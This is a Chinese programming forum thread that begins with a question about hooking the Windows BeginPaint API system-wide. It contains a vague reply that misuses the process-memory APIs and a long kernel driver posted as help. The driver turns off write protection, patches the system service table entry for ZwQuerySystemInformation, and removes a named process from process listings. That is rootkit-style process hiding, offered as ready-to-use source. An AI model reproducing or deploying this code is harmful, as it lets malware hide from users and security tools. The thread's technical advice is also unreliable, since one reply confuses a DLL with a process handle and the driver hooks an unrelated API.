user32.dll里有个API, BeginPaint。
我想让整个Window,不论是否是我的程序,只要使用了这个API就进到我指定的一个函数中,这个函数的参数,返回值都和原来的一样。能实现吗?而且在我的函数中可以调用原来的BeginPaint。也就是说我想在BeginPaint之前和之后做些事情。大侠,拜托了。
我想让整个Window,不论是否是我的程序,只要使用了这个API就进到我指定的一个函数中,这个函数的参数,返回值都和原来的一样。能实现吗?而且在我的函数中可以调用原来的BeginPaint。也就是说我想在BeginPaint之前和之后做些事情。大侠,拜托了。
先获得beginpaint的地址,将其的保存并用另一函数名mypanit,再将你的函数写到这个地址
你自己则调用mypaint,好象读写地址用
BOOL ReadProcessMemory(
HANDLE hProcess,
LPCVOID lpBaseAddress,
LPVOID lpBuffer,
SIZE_T nSize,
SIZE_T* lpNumberOfBytesRead
);
hProcess 就是user32.dll
读出来保存BOOL WriteProcessMemory(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T* lpNumberOfBytesWritten
);
再将你的写进来
估计你要是拦截BeginPaint windows 都不能运行了
{
// do something
HDC hdc = Old_BeginPaint(hwnd, lpPaint);
// do something
return hdc;
}windows还是可以运行的,是吧!
看了楼上的,还是一头雾水,能搞个代码看看吗?
#include "string.h" #define IOCTL_EVENT_MSG CTL_CODE(FILE_DEVICE_UNKNOWN, 0x927, METHOD_BUFFERED , FILE_ANY_ACCESS) struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
}; struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
}; typedef struct _ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;//ULONG KeServiceDescriptorTable = 0x8046AB80;
extern PServiceDescriptorTableEntry KeServiceDescriptorTable; typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
static NTSTATUS MydrvDispatchIoctl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject);
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
UNICODE_STRING nameString, linkString;
PDEVICE_OBJECT deviceObject;
NTSTATUS status;
WCHAR wBuffer[200];
ULONG CR0VALUE; nameString.Buffer = wBuffer;
nameString.MaximumLength = 200; DriverObject->DriverUnload = DriverUnload; RtlInitUnicodeString(&nameString, L"\\Device\\MyDriver"); status = IoCreateDevice(
DriverObject,
0, // 无设备扩展
&nameString,
FILE_DEVICE_UNKNOWN,
0,
TRUE,
&deviceObject
); if (!NT_SUCCESS( status ))
return status; deviceObject->Flags |= DO_BUFFERED_IO; RtlInitUnicodeString(&linkString, L"\\??\\MyDriver"); status = IoCreateSymbolicLink (&linkString, &nameString); if (!NT_SUCCESS( status ))
{
IoDeleteDevice (DriverObject->DeviceObject);
return status;
} DriverObject->MajorFunction[IRP_MJ_CREATE] = MydrvDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = MydrvDispatch;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MydrvDispatchIoctl; __asm{
mov eax, cr0
mov CR0VALUE, eax
and eax, 0fffeffffh
mov cr0, eax
} RealZwQuerySystemInformation = (REALZWQUERYSYSTEMINFORMATION)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x97));
*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x97) = HookZwQuerySystemInformation;
__asm{
mov eax, CR0VALUE
mov cr0, eax
}
return STATUS_SUCCESS;
}
static NTSTATUS MydrvDispatch (IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
NTSTATUS status;
PIO_STACK_LOCATION irpSp; UNREFERENCED_PARAMETER(DeviceObject); //得到当前IRP (I/O请求包)
irpSp = IoGetCurrentIrpStackLocation( Irp ); switch (irpSp->MajorFunction)
{
case IRP_MJ_CREATE:
DbgPrint("IRP_MJ_CREATE\n");
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0L; break; case IRP_MJ_CLOSE:
DbgPrint("IRP_MJ_CLOSE\n");
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0L; break;
} IoCompleteRequest(Irp, 0);
return STATUS_SUCCESS; }
static NTSTATUS MydrvDispatchIoctl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
PIO_STACK_LOCATION IrpStack;
NTSTATUS status;
ULONG ControlCode;
ULONG InputLength,OutputLength;
TCHAR wInputBuffer[200];
TCHAR OutMsg[] = "Message send by driver"; // 得到当前IRP (IO请求包)
IrpStack = IoGetCurrentIrpStackLocation(Irp); // 得到DeviceIoControl传来的功能调用号
ControlCode = IrpStack->Parameters.DeviceIoControl.IoControlCode;
// 得到DeviceIoControl传来的输入缓冲区长度
InputLength = IrpStack->Parameters.DeviceIoControl.InputBufferLength;
// 得到DeviceIoControl的输出缓冲区长度
OutputLength = IrpStack->Parameters.DeviceIoControl.OutputBufferLength; switch (ControlCode)
{
case IOCTL_EVENT_MSG:
// DbgPrint("IOCTL_EVENT_MSG\n"); RtlCopyMemory(Irp->AssociatedIrp.SystemBuffer, OutMsg, sizeof(OutMsg));
Irp->IoStatus.Status = STATUS_SUCCESS;
OutputLength = sizeof(OutMsg);
Irp->IoStatus.Information = OutputLength;
break;
} status = Irp->IoStatus.Status; IoCompleteRequest(Irp, 0);
return status;
}
VOID DriverUnload (IN PDRIVER_OBJECT pDriverObject)
{
UNICODE_STRING nameString;
RtlInitUnicodeString(&nameString, L"\\??\\MyDriver");
IoDeleteSymbolicLink(&nameString);
IoDeleteDevice(pDriverObject->DeviceObject);
*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x97) = RealZwQuerySystemInformation;
return;
} NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc; UNICODE_STRING process_name;
RtlInitUnicodeString(&process_name, L"TestDriver.EXE"); rc = (RealZwQuerySystemInformation) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if(NT_SUCCESS(rc))
{
if(5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta); while(curr)
{
if (RtlCompareUnicodeString(&process_name, &curr->ProcessName, 1) == 0)
{ if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
} if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;
break;
}
} if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else curr = NULL;
} } // end while(curr)
}
}
return rc;
}//希望对你有所帮助!
高手救救我!!!